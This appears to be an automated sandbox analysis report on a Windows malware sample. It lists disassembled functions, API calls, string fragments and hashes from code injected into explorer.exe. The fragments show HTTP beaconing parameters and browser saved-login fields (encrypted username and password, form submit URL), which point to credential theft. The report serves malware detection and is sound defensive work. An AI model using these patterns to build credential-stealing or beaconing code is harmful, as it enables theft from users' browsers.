String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 89e4ca4c786165b5026eb09fb708e15f2abff92fdc1aa991ebc1711e873b6113
Instruction ID: b282f48ce3fd39dba9575b9c5802628e53a6e4b7162ce36bb7321e5a8752069c
Opcode Fuzzy Hash: 89e4ca4c786165b5026eb09fb708e15f2abff92fdc1aa991ebc1711e873b6113
Instruction Fuzzy Hash: 0751E7316402197AEF21EBE9DD89FFB7BB8EF18304F4400A9E605A7191E7729E458F50

Function 01ABB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01ABB6BF

Strings

-, xrefs: 01ABB650
0, xrefs: 01ABB695
0, xrefs: 01ABB66F
+, xrefs: 01ABB65A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 6391169dcae286b80788c7bbeb9e7baacdbedabe258b31309d7bea86700771b8
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 5D816070E062C99EEF25CFACC8D17EEBBB9AF45310F1C4259D951A7293C63498818771

Function 01B220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B2214F
___swprintf_l.LIBCMT ref: 01B22172

Strings

%%%u, xrefs: 01B22146
]:%u, xrefs: 01B22169
[, xrefs: 01B2212B

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: b0c599a036712ddea9b7cd3ea303d3a0af82d76d84dba72ce874704f5b7fd5cc
Instruction ID: 5ab18c9b7637808145932a860f33e230167cf25dc6bc82c5f3104e99c9ce69c7
Opcode Fuzzy Hash: b0c599a036712ddea9b7cd3ea303d3a0af82d76d84dba72ce874704f5b7fd5cc
Instruction Fuzzy Hash: F721537AA00129ABDB15DE6ACD40EEE7BFCEF54651F14019AE909D3201E73499058BA1

Function 01A9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AE02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AE02E7
RTL: Re-Waiting, xrefs: 01AE031E

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 3f794e97bbf49e21c07ac4237dd91b02183af1db5ae90d9d5b49cd23dd93626b
Instruction ID: e7af05146e6c7d1778a7c7637e7bd62374b8c66a41cae84cc07e18ec5b88d55d
Opcode Fuzzy Hash: 3f794e97bbf49e21c07ac4237dd91b02183af1db5ae90d9d5b49cd23dd93626b
Instruction Fuzzy Hash: 18E1AF316047429FDB25CF28C984B6ABBE0BF84314F144A6DF6A5CB2E1D774D985CB82

Function 01AABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AE7B7F
RTL: Resource at %p, xrefs: 01AE7B8E
RTL: Re-Waiting, xrefs: 01AE7BAC

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 3006c9eda646ff4225cd7fc5de038cadbeb3a9a35cf567bb907df3b2bfd617f6
Instruction ID: 0efbbe3a4ce514a54674448b5ad437b46b08653f0747a3142f080c92ba5becb2
Opcode Fuzzy Hash: 3006c9eda646ff4225cd7fc5de038cadbeb3a9a35cf567bb907df3b2bfd617f6
Instruction Fuzzy Hash: 0F4106353047429FDB25DF29C940B6AB7E9EF98710F440A1DFA5AD7680DB32E8058BA1

Function 01AAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AE728C

Strings

RTL: Resource at %p, xrefs: 01AE72A3
RTL: Re-Waiting, xrefs: 01AE72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AE7294

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 215e65129c682a8f50e2e9fe39f4e01cfed1cb02020e60dc37b934e465c646a8
Instruction ID: e515d28d66317f0e512a3c5e716f2c56997aef15e3834d77788d5e095f32def6
Opcode Fuzzy Hash: 215e65129c682a8f50e2e9fe39f4e01cfed1cb02020e60dc37b934e465c646a8
Instruction Fuzzy Hash: 5141DF32600302ABD721DFA9CD41B6ABBE5FB94710F140619F956EB281DB31E8528BE1

Function 01B22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B2238D
___swprintf_l.LIBCMT ref: 01B223B3

Strings

%%%u, xrefs: 01B22384
]:%u, xrefs: 01B223AA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ae6ae8691b355c846c4d5e1caca9868077cd12e70650f35eabd8ea93a4f3d82e
Instruction ID: d5fa4832f2cf77b3ad2a60d73f1c5772fb86671ef3f1e2de5c2e672339c9f881
Opcode Fuzzy Hash: ae6ae8691b355c846c4d5e1caca9868077cd12e70650f35eabd8ea93a4f3d82e
Instruction Fuzzy Hash: E33168766001299FDB24DE2DCD80BEE77F8FF54610F4445D9E94DE3141EB309A498B60

Function 01AB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01AB7E8B

Strings

+, xrefs: 01AB7DE8
-, xrefs: 01AB7DDD

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 1b0edb12c6d869f9f4ca10670a4f8234dbd3aa4151238779dc6c8774037a78e4
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: E391C370E002969AEB24DFADC8C06FEBBBDAF84760F14451AE955E72C2D7B48940CB14

Function 01A79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01A79175
$, xrefs: 01A79191

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: bbabc3b8e17548cc496e96dd716f5545a3cf14e639017f1056975280cf664f59
Instruction ID: 36aa0484fd152a798dae8b990f67a625f16e64ae7f5fd90952525b86e330285b
Opcode Fuzzy Hash: bbabc3b8e17548cc496e96dd716f5545a3cf14e639017f1056975280cf664f59
Instruction Fuzzy Hash: 47812C71D006699BDB31DB54CD44BEAB7B4AF48714F0441DAEA1EB7290E7305E84CFA0

Analysis Process: explorer.exePID: 1028, Parent PID: 7256COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 10A36F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 10A3712E
setsockopt.WS2_32 ref: 10A37830
recv.WS2_32 ref: 10A37859

Strings

&un=, xrefs: 10A374F1
tion, xrefs: 10A37331
&sql, xrefs: 10A37471
Co, xrefs: 10A37323
nnec, xrefs: 10A3732A
ose, xrefs: 10A3733F
: cl, xrefs: 10A37338
dat=, xrefs: 10A37290
GET , xrefs: 10A37318
&br=, xrefs: 10A37509

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 55cbfbd94762f82ba2c5d790292f5b1d058f28600a8cd6f619915283932bda54
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: F3528D30618B488FC769EF68C4857EAB7E1FB54301F50462ED4ABCB246DE74B949CB81

Function 10A36232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 10A36449

Strings

`, xrefs: 10A3641D

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 3c50f23519410e96dcc90958d9885fab3f40760acfb165eead9eb4c7898552a1
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: C7224B70A18A099FCB89DF68C4957AAF7F1FB5C306F41422EE45EDB250DB30A851CB85

Function 10A37E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10A37E67

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 810134a526665acadb3c194a7024d7cbe171279527d8206c0dbd6dcc8af0c963
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: A4017134668B884F9788EF6CD48522AB7E4FBDD315F000B3EE99AC7254EB74D5414782

Function 10A37E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10A37E67

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 95c55c4d92a73bee7a7f056ab9d8837b35a98e83e57fe045fdad4e5a5f3d6b9b
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: FF01A234628B884B8748EB6C94422A6B7E5FBCE315F000B7EE99AC7240DB31D5024782

Function 10A318C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10A319A0

Strings

urlmon.dll, xrefs: 10A31959
User-Agent: , xrefs: 10A31935, 10A31948
on.d, xrefs: 10A31902
nt: , xrefs: 10A3191E

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 36769bf7fee81acceb8ccbb10bd31bfdfd2fb30dd5fa024ed2e463296243bd62
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 5F31D171614A0C8BCB45EFA8C8857EDBBF0FF58205F40422AE44EDB240DF789649C789

Function 10A318BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10A319A0

Strings

urlmon.dll, xrefs: 10A31959
User-Agent: , xrefs: 10A31935, 10A31948
on.d, xrefs: 10A31902
nt: , xrefs: 10A3191E

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: aab0cf0ff68d4f73ad4f70467117a4bc67f8d1c7c649a2dbe9e12a43eeb75106
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 6221E470610A4C8BCF45EFA8C8957EDBBF0FF58206F40422AE45ADB240DF74A605CB89

Function 10A2DB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10A2DCCA

Strings

el32, xrefs: 10A2DBA0
.dll, xrefs: 10A2DBCD
kern, xrefs: 10A2DB99

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 5f259bac8c70e2eb2d26c82f1c3b48f7f421ca0f2f176f0db331ea6443b343e1
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: CA417974918A088FDB84EFA8D8997AD77E0FB68301F40417AD84EDB256DE30A945CB85

Function 10A2DB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10A2DCCA

Strings

el32, xrefs: 10A2DBA0
.dll, xrefs: 10A2DBCD
kern, xrefs: 10A2DB99

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: a684dcafa8ca8b512ec6392032b024ddd8c58e0c191ec2044784fc15e23d9d44
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 7B414B74918A088FDB84EFA8D8997AD77F0FB68301F40417AD84EDB255DE30A945CB85

Function 10A3372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10A33791

Strings

ect, xrefs: 10A33761
conn, xrefs: 10A3375A

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: bbc16e9ee72968f821c5ee2eafeed36ea1b4fd4b8de6bee97ca36e2b95d9470a
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 7D015E70618B188FCB84EF1CE089B55B7E0FB58315F1545AEE90DCB226C674D8818BC2

Function 10A33732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10A33791

Strings

ect, xrefs: 10A33761
conn, xrefs: 10A3375A

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: f6c9421d0711dd4be35bcbc35918280adf4333bd768bd6a0c928e7bd7be3b3d1
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 1C012C70618A1C8FCB84EF5CE089B55B7E0FB59315F1541AEA80DCB226CAB4C9818BC2

Function 10A336B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 10A33713

Strings

send, xrefs: 10A336DA

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 89be039d021283114abcd1b1609e298d20a5908cee0c702eba58d86ac78685d9
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: D601127051CA188FDB84DF1CD049B15B7E0EB58315F1645AED85DCB266C670D8818B85

Function 10A335B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 10A33611

Strings

sock, xrefs: 10A335D9

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 5adb504ae829e7a01dc73f0781b1f3ab3cb0f3f1cb2b48b68d06ee428a7389a9
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 450171306186188FC784DF1CD049B50BBE0FB59314F1545ADE40ECB326C7B0C9818B86

Function 10A2B2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 10A2B32D

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: c92e2b8a34b3214c4671fa68f8f438e2d43d648e2dbde13676c1f1c9c071f53b
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 74317C74624B49DFDB54DF2990882E5B7A1FB54300F84427EC96DCB106CB30A850CFD1

Function 10A2B412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 10A2B461

Memory Dump Source

Source File: 0000000A.00000002.4489782694.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10930000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 7b0ac48ba6e7a8f7e69ea2ab45bf1ffd2ea004c0176cddd0e915e95c89944ea7
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 28F04630268B084FDB88EF2CD48263AF3D0FBEC205F40463EA54DC7220CA38C5828716

Non-executed Functions

Function 10802D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 10802F13
wini, xrefs: 10802F72
dll, xrefs: 10802F4C
net., xrefs: 10802F44
32.d, xrefs: 10802F0B
.dll, xrefs: 10802F2F
M, xrefs: 10803082
kern, xrefs: 10802F5A
el32, xrefs: 10802F27
user, xrefs: 10802F03
S, xrefs: 10803073

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 5b884a5288803721efecfcaf0c6ab3a4482f4de88255c6c89cd0dd540c10fcba
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 2AE14C74628F488FC764DF68C8957ABB7E0FB58300F504A2EA59BC7255EF30A541CB45

Function 09722D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

.dll, xrefs: 09722F2F
wini, xrefs: 09722F72
user, xrefs: 09722F03
S, xrefs: 09723073
32.d, xrefs: 09722F0B
M, xrefs: 09723082
kern, xrefs: 09722F5A
el32, xrefs: 09722F27
net., xrefs: 09722F44
ll, xrefs: 09722F13
dll, xrefs: 09722F4C

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 6199709d3b7ea611356c8de38e2aa2300ee54d4fc0595c42c6134144223417a9
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: DBE16871628F588FC764EF68C4887AAB7E0FF58300F509A2E959BC7245DF34A501CB89

Function 10805792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

name, xrefs: 1080587D
ypte, xrefs: 108058DA
rnam, xrefs: 108058B5
encr, xrefs: 108058D2
encr, xrefs: 1080589D
d, xrefs: 108058F2
form, xrefs: 1080584D
swor, xrefs: 108058EA
ypte, xrefs: 108058A5
Subm, xrefs: 10805855
dPas, xrefs: 108058E2
Fiel, xrefs: 10805884
dUse, xrefs: 108058AD
e, xrefs: 108058BD
guid, xrefs: 108057CE
user, xrefs: 10805876
itUR, xrefs: 1080585D

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 1f0c90c0d4abe621cdc98b8d60a37dd705ca071f97bdf55f0bf7ccc40586966f
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 2FB18B34518B488EDB55EF68C88AAEEB7F1FF98300F50451EE49AC7255EF70A405CB86

Function 09725792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 097258D2
d, xrefs: 097258F2
Subm, xrefs: 09725855
encr, xrefs: 0972589D
Fiel, xrefs: 09725884
dPas, xrefs: 097258E2
dUse, xrefs: 097258AD
name, xrefs: 0972587D
itUR, xrefs: 0972585D
user, xrefs: 09725876
rnam, xrefs: 097258B5
e, xrefs: 097258BD
guid, xrefs: 097257CE
swor, xrefs: 097258EA
form, xrefs: 0972584D
ypte, xrefs: 097258A5
ypte, xrefs: 097258DA

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: b8a05e51f0a55c6bda5f129193e4d69345c6e2865f686040e57fa557d2d642e6
